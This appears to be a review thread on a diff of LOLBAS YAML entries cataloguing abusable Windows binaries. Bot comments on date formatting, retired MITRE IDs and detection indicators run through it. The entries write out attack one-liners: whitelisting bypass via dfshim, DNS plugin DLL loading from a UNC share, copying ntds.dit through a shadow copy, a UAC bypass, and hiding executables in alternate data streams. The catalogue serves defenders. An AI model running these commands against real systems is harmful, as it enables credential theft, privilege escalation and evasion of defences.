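Review bot: The command only works because it first overrides `SYSTEMROOT` to `C:\Windows\Temp`, yet neither IOC mentions that redirection, which is the most specific thing about this technique. Where endpoint telemetry exposes the process environment, `- IOC: desktopimgdownldr.exe running with a SYSTEMROOT environment variable that is not C:\Windows` is a direct signal; where it does not, the write landing under the redirected root rather than the real Windows directory is the observable to describe. The MitreID/MitreLink lines fall between the two visible hunks.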
@ -2,9 +2,9 @@
|
|||||||
Name: Dfsvc.exe
|
Name: Dfsvc.exe
|
||||||
Description: ClickOnce engine in Windows used by .NET
|
Description: ClickOnce engine in Windows used by .NET
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||||
Description: Executes click-once-application from Url
|
Description: Executes click-once-application from Url
|
||||||
Usecase: Use binary to bypass Application whitelisting
|
Usecase: Use binary to bypass Application whitelisting
|
||||||
Category: AWL bypass
|
Category: AWL bypass
|
||||||
@ -17,14 +17,14 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
---
|
---
|
||||||
|
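Review bot: The `Detection` list contains only a bare `- IOC:` (null), while the command in this entry is concrete enough to key on: it runs `rundll32.exe dfshim.dll,ShOpenVerbApplication` with a URL argument. Suggested entries: `- IOC: rundll32.exe with "dfshim.dll,ShOpenVerbApplication" and a URL on the command line` and, if dfsvc.exe is the process that ends up hosting the ClickOnce application as the entry name implies, `- IOC: dfsvc.exe making outbound network connections`. Note also that the entry is named Dfsvc.exe but the documented command never invokes that binary directly, which a reader searching by process name may find confusing; a sentence in the Description saying how dfsvc.exe enters the picture would help.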
@ -2,11 +2,11 @@
|
|||||||
Name: Diantz.exe
|
Name: Diantz.exe
|
||||||
Description: Binary that package existing files into a cabinet (.cab) file
|
Description: Binary that package existing files into a cabinet (.cab) file
|
||||||
Author: 'Tamir Yehuda'
|
Author: 'Tamir Yehuda'
|
||||||
Created: '08/08/2020'
|
Created: 2020-08-08
|
||||||
Commands:
|
Commands:
|
||||||
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||||
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Hide data compressed into an Alternate Data Stream.
|
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
||||||
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||||||
Description: Download and compress a remote file and store it in a cab file on local machine.
|
Description: Download and compress a remote file and store it in a cab file on local machine.
|
||||||
Usecase: Download and compress into a cab file.
|
Usecase: Download and compress into a cab file.
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
@ -23,9 +23,9 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\diantz.exe
|
- Path: c:\windows\system32\diantz.exe
|
||||||
- Path: c:\windows\syswow64\diantz.exe
|
- Path: c:\windows\syswow64\diantz.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: diantz storing data into alternate data streams.
|
- IOC: diantz storing data into alternate data streams.
|
||||||
- IOC: diantz getting a file from a remote machine or the internet.
|
- IOC: diantz getting a file from a remote machine or the internet.
|
||||||
Resources:
|
Resources:
|
||||||
|
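Review bot: `MitreID: T1096` on the ADS command is a retired ATT&CK technique; NTFS file attributes/ADS now map to sub-technique T1564.004 (`MitreID: T1564.004`, `MitreLink: https://attack.mitre.org/techniques/T1564/004/`), and the matching MitreLink line sits just outside this hunk. Two wording slips in the visible lines: `Binary that package existing files` should read `Binary that packages existing files`, and `Compress taget file` should read `Compress target file`. The first command's `OperatingSystem` list ends with a stray period and stops at Windows 8.1, while the second command's list is not visible here; worth confirming whether Windows 10 was deliberately left out.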
@ -2,7 +2,7 @@
|
|||||||
Name: Diskshadow.exe
|
Name: Diskshadow.exe
|
||||||
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
- Command: diskshadow.exe /s c:\test\diskshadow.txt
|
||||||
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\diskshadow.exe
|
- Path: C:\Windows\System32\diskshadow.exe
|
||||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Child process from diskshadow.exe
|
- IOC: Child process from diskshadow.exe
|
||||||
@ -33,4 +33,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Jimmy
|
- Person: Jimmy
|
||||||
Handle: '@bohops'
|
Handle: '@bohops'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Dnscmd.exe
|
Name: Dnscmd.exe
|
||||||
Description: A command-line interface for managing DNS servers
|
Description: A command-line interface for managing DNS servers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
- Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
|
||||||
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Dnscmd.exe
|
- Path: C:\Windows\System32\Dnscmd.exe
|
||||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Dnscmd.exe loading dll from UNC path
|
- IOC: Dnscmd.exe loading dll from UNC path
|
||||||
@ -32,4 +32,4 @@ Acknowledgement:
|
|||||||
Handle: '@dim0x69'
|
Handle: '@dim0x69'
|
||||||
- Person: Nikhil SamratAshok
|
- Person: Nikhil SamratAshok
|
||||||
Handle: '@nikhil_mitt'
|
Handle: '@nikhil_mitt'
|
||||||
---
|
---
|
||||||
|
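Review bot: The IOC `Dnscmd.exe loading dll from UNC path` describes something dnscmd.exe does not do: `/config /serverlevelplugindll` only writes the plugin path into the DNS server's configuration, and the DLL is loaded by the DNS service process (dns.exe) when it next starts, which is why the linked write-ups restart the service. Detection should therefore watch the configuration change and the service-side load, e.g. `- IOC: Modification of HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll` and `- IOC: dns.exe loading a DLL from a UNC path or from outside System32`, with the dnscmd.exe command line as a third, weaker signal. The MitreID/MitreLink lines for this entry are between the two visible hunks.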
@ -2,12 +2,12 @@
|
|||||||
Name: Esentutl.exe
|
Name: Esentutl.exe
|
||||||
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
Description: Binary for working with Microsoft Joint Engine Technology (JET) database
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
- Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||||||
Description: Copies the source VBS file to the destination VBS file.
|
Description: Copies the source VBS file to the destination VBS file.
|
||||||
Usecase: Copies files from A to B
|
Usecase: Copies files from A to B
|
||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
@ -29,7 +29,7 @@ Commands:
|
|||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
- Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||||||
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
|
||||||
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
@ -47,7 +47,7 @@ Commands:
|
|||||||
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
- Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
|
||||||
Description: Copies a (locked) file using Volume Shadow Copy
|
Description: Copies a (locked) file using Volume Shadow Copy
|
||||||
Usecase: Copy/extract a locked file such as the AD Database
|
Usecase: Copy/extract a locked file such as the AD Database
|
||||||
Category: Copy
|
Category: Copy
|
||||||
Privileges: Admin
|
Privileges: Admin
|
||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/techniques/T1003/
|
MitreLink: https://attack.mitre.org/techniques/T1003/
|
||||||
@ -55,10 +55,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\esentutl.exe
|
- Path: C:\Windows\System32\esentutl.exe
|
||||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/egre55/status/985994639202283520
|
- Link: https://twitter.com/egre55/status/985994639202283520
|
||||||
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
- Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
|
||||||
|
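Review bot: `Detection` holds only a bare `- IOC:` (null) even though the three visible commands each have a distinctive shape: `/y` with a destination containing a `:` stream name, `/y` with a UNC/WebDAV source, and `/y /vss` against ntds.dit. Suggested entries: `- IOC: esentutl.exe /y with a destination path containing a ':' stream name`, `- IOC: esentutl.exe /y copying from a UNC or WebDAV source`, and `- IOC: esentutl.exe invoked with /vss, especially against ntds.dit or SAM`. The Usecase `Copy file and hide it in an alternate data stream as a defensive counter measure` says the opposite of what is meant; `to evade defensive measures` matches the other ADS entries. The MitreID/MitreLink for the ADS command are split across hunk boundaries here.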
@ -2,11 +2,11 @@
|
|||||||
Name: Eventvwr.exe
|
Name: Eventvwr.exe
|
||||||
Description: Displays Windows Event Logs in a GUI window.
|
Description: Displays Windows Event Logs in a GUI window.
|
||||||
Author: 'Jacob Gajek'
|
Author: 'Jacob Gajek'
|
||||||
Created: '2018-11-01'
|
Created: 2018-11-01
|
||||||
Commands:
|
Commands:
|
||||||
- Command: eventvwr.exe
|
- Command: eventvwr.exe
|
||||||
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||||
Category: UAC bypass
|
Category: UAC bypass
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1088
|
MitreID: T1088
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\eventvwr.exe
|
- Path: C:\Windows\System32\eventvwr.exe
|
||||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
- Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: eventvwr.exe launching child process other than mmc.exe
|
- IOC: eventvwr.exe launching child process other than mmc.exe
|
||||||
|
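Review bot: `MitreID: T1088` is a retired ATT&CK technique; UAC bypass is now sub-technique T1548.002, so `MitreID: T1548.002` with `MitreLink: https://attack.mitre.org/techniques/T1548/002/` is the current mapping (the MitreLink line itself is just outside this hunk). The Description already names the registry value that makes the bypass work, so a second IOC is free: `- IOC: Creation or modification of HKCU\Software\Classes\mscfile\shell\open\command`, which fires before the child process that the existing IOC waits for. Renaming `Code Sample:` to `Code_Sample:` is the right fix; the old spelling would have been an unrecognised key for any schema-driven consumer.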
@ -2,7 +2,7 @@
|
|||||||
Name: Expand.exe
|
Name: Expand.exe
|
||||||
Description: Binary that expands one or more compressed files
|
Description: Binary that expands one or more compressed files
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
- Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
|
||||||
Description: Copies source file to destination.
|
Description: Copies source file to destination.
|
||||||
@ -31,10 +31,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Expand.exe
|
- Path: C:\Windows\System32\Expand.exe
|
||||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
- Link: https://twitter.com/infosecn1nja/status/986628482858807297
|
||||||
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
- Link: https://twitter.com/Oddvarmoe/status/986709068759949319
|
||||||
@ -43,4 +43,4 @@ Acknowledgement:
|
|||||||
Handle: '@infosecn1nja'
|
Handle: '@infosecn1nja'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
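Review bot: Dropping the quotes on `Created: 2018-05-25` changes the loaded type: under a YAML 1.1 loader such as PyYAML's safe_load the value becomes a datetime.date rather than the string the quoted form produced, so any consumer that compares or concatenates it as text would break. yamllint's default ruleset does not require unquoting, so the line could stay as `Created: '2018-05-25'`; if a date type is actually wanted, the change should be checked against whatever generates the site from these files. The same unquoting is applied on the `Created:` line of every other binary in this commit (Explorer through MpCmdRun), so one decision should cover all of them.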
@ -2,7 +2,7 @@
|
|||||||
Name: Explorer.exe
|
Name: Explorer.exe
|
||||||
Description: Binary used for managing files and system components within Windows
|
Description: Binary used for managing files and system components within Windows
|
||||||
Author: 'Jai Minton'
|
Author: 'Jai Minton'
|
||||||
Created: '2020-06-24'
|
Created: 2020-06-24
|
||||||
Commands:
|
Commands:
|
||||||
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||||
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\explorer.exe
|
- Path: C:\Windows\explorer.exe
|
||||||
- Path: C:\Windows\SysWOW64\explorer.exe
|
- Path: C:\Windows\SysWOW64\explorer.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Extexport.exe
|
Name: Extexport.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: Extexport.exe c:\test foo bar
|
- Command: Extexport.exe c:\test foo bar
|
||||||
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
|
||||||
@ -15,7 +15,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||||
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||||
@ -24,4 +24,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Adam
|
- Person: Adam
|
||||||
Handle: '@hexacorn'
|
Handle: '@hexacorn'
|
||||||
---
|
---
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
---
|
---
|
||||||
Name: Extrac32.exe
|
Name: Extrac32.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
|
||||||
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
@ -14,7 +14,7 @@ Commands:
|
|||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
|
||||||
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
|
||||||
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
Usecase: Extract data from cab file and hide it in an alternate data stream.
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
@ -39,10 +39,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\extrac32.exe
|
- Path: C:\Windows\System32\extrac32.exe
|
||||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
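Review bot: The bare `- Code:` and `- IOC:` entries under `Code_Sample:` and `Detection:`, and the empty `Description:` near the top of the first hunk, load as null values (a one-element list holding `{Code: null}` rather than an empty list), which yamllint's default `empty-values` rule does not flag. If the intent is "no sample" and "no detection", the explicit forms `Code_Sample: []` and `Detection: []` are unambiguous and spare the renderer a null check, and an empty `Description:` should either be filled in or written as `Description: ''`. The same pattern appears in most of the other hunks in this commit (Expand, Extexport, Findstr, Forfiles, Ftp, Gpscript, Hh, Ie4uinit, Ieexec, Ilasm, Installutil, Jsc, Makecab, Mavinject, Microsoft.Workflow.Compiler, Mmc), so it is worth settling once.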
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
Name: Findstr.exe
|
Name: Findstr.exe
|
||||||
Description:
|
Description:
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
- Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
|
||||||
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
|
||||||
@ -39,7 +39,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\findstr.exe
|
- Path: C:\Windows\System32\findstr.exe
|
||||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: findstr.exe should normally not be invoked on a client system
|
- IOC: findstr.exe should normally not be invoked on a client system
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Forfiles.exe
|
Name: Forfiles.exe
|
||||||
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-05-25'
|
Created: 2018-05-25
|
||||||
Commands:
|
Commands:
|
||||||
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
|
||||||
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
|
||||||
@ -23,10 +23,10 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\forfiles.exe
|
- Path: C:\Windows\System32\forfiles.exe
|
||||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
- Link: https://twitter.com/vector_sec/status/896049052642533376
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
@ -36,4 +36,4 @@ Acknowledgement:
|
|||||||
Handle: '@vector_sec'
|
Handle: '@vector_sec'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
---
|
---
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: Ftp.exe
|
Name: Ftp.exe
|
||||||
Description: A binary designed for connecting to FTP servers
|
Description: A binary designed for connecting to FTP servers
|
||||||
Author: 'Oddvar Moe'
|
Author: 'Oddvar Moe'
|
||||||
Created: '2018-12-10'
|
Created: 2018-12-10
|
||||||
Commands:
|
Commands:
|
||||||
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
- Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
|
||||||
Description: Executes the commands you put inside the text file.
|
Description: Executes the commands you put inside the text file.
|
||||||
@ -23,7 +23,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\ftp.exe
|
- Path: C:\Windows\System32\ftp.exe
|
||||||
- Path: C:\Windows\SysWOW64\ftp.exe
|
- Path: C:\Windows\SysWOW64\ftp.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: cmd /c as child process of ftp.exe
|
- IOC: cmd /c as child process of ftp.exe
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
Name: GfxDownloadWrapper.exe
|
Name: GfxDownloadWrapper.exe
|
||||||
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||||
Author: Jesus Galvez
|
Author: Jesus Galvez
|
||||||
Created: Jesus Galvez
|
Created: 2019-12-27
|
||||||
Commands:
|
Commands:
|
||||||
